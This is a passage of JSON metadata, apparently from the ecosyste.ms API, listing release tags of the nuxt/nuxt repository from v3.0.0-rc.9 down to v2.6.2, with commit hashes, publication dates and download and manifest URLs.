.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/t